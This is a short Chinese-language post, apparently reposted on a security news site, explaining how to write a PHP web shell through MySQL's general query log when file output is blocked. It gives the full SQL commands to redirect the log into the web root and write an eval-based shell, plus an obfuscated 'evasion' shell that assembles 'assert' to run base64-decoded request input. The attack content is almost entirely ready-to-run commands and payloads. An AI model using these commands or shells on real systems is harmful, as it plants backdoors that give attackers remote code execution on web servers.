SQL语句利用日志写shell

09W+0
华盟原创文章投稿奖励计划

outfile被禁止,或者写入文件被拦截;

数据库中操作如下:(必须是root权限)

show variables like ‘%general%’;  #查看配置

set global general_log = on;  #开启general log模式

set global general_log_file = ‘/var/www/html/1.php’;   #设置日志目录为shell地址

select ‘<?php eval($_POST[cmd]);?>’  #写入shell


SQL查询免杀shell的语句


SELECT “<?php $p = array(‘f’=>’a’,’pffff’=>’s’,’e’=>’fffff’,’lfaaaa’=>’r’,’nnnnn’=>’t’);$a = array_keys($p);$_=$p[‘pffff’].$p[‘pffff’].$a[2];$_=’a’.$_.’rt’;$_(base64_decode($_REQUEST[‘username’]));?>”


文章出处:Evi1cg’s blog   

原文链接:

https://evi1cg.me/archives/test1.html

© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
安全技术
# SQL语句利用# 日志写shell
喜欢就支持一下吧
点赞0 分享
Afeifei666666的头像-华盟网
360推出Tuber可直接上油管的浏览器!-华盟网
360推出Tuber可直接上油管的浏览器!
360推出Tuber可直接上油管的浏览器!
6年前 75W+
2020薪资最高的行业前十位出炉!你选对了吗?-华盟网
2020薪资最高的行业前十位出炉!你选对了吗?
2020薪资最高的行业前十位出炉!你选对了吗?
6年前 56.6W+
原创干货 | 一次对某组织的应急响应-华盟网
原创干货 | 一次对某组织的应急响应
原创干货 | 一次对某组织的应急响应
6年前 49.6W+
黑鹰基地站长最新动态-华盟网
黑鹰基地站长最新动态
黑鹰基地站长最新动态
6年前 49.5W+
关注 | 《网络信息内容生态治理规定》今日起正式施行(附全文及解读)-华盟网
关注 | 《网络信息内容生态治理规定》今日起正式施行(附全文及解读)
关注 | 《网络信息内容生态治理规定》今日起正式施行(附全文及解读...
6年前 47.5W+
微软确认修复Windows 10 19041官方镜像下载反复报错问题-华盟网
微软确认修复Windows 10 19041官方镜像下载反复报错问题
微软确认修复Windows 10 19041官方镜像下载反复报错问题
6年前 29.8W+
相关推荐
使用Enum4linux和Smbclient枚举SMB-华盟网
使用Enum4linux和Smbclient枚举SMB
使用Enum4linux和Smbclient枚举SMB
6年前 22W+
串口数据抓取以及串口数据模拟-华盟网
串口数据抓取以及串口数据模拟
串口数据抓取以及串口数据模拟
6年前 21.9W+
盘点一下在渗透测试中可能用到的网络搜索引擎-华盟网
盘点一下在渗透测试中可能用到的网络搜索引擎
盘点一下在渗透测试中可能用到的网络搜索引擎
4年前 20W+
使用Dirsearch查找隐藏目录-华盟网
使用Dirsearch查找隐藏目录
使用Dirsearch查找隐藏目录
7年前 18.6W+
机器被黑以后处理步骤-华盟网
机器被黑以后处理步骤
机器被黑以后处理步骤
7年前 14.2W+
Docker简单搭建Vulfocus靶场-华盟网
Docker简单搭建Vulfocus靶场
Docker简单搭建Vulfocus靶场
6年前 13.7W+
评论 抢沙发

请登录后发表评论

    暂无评论内容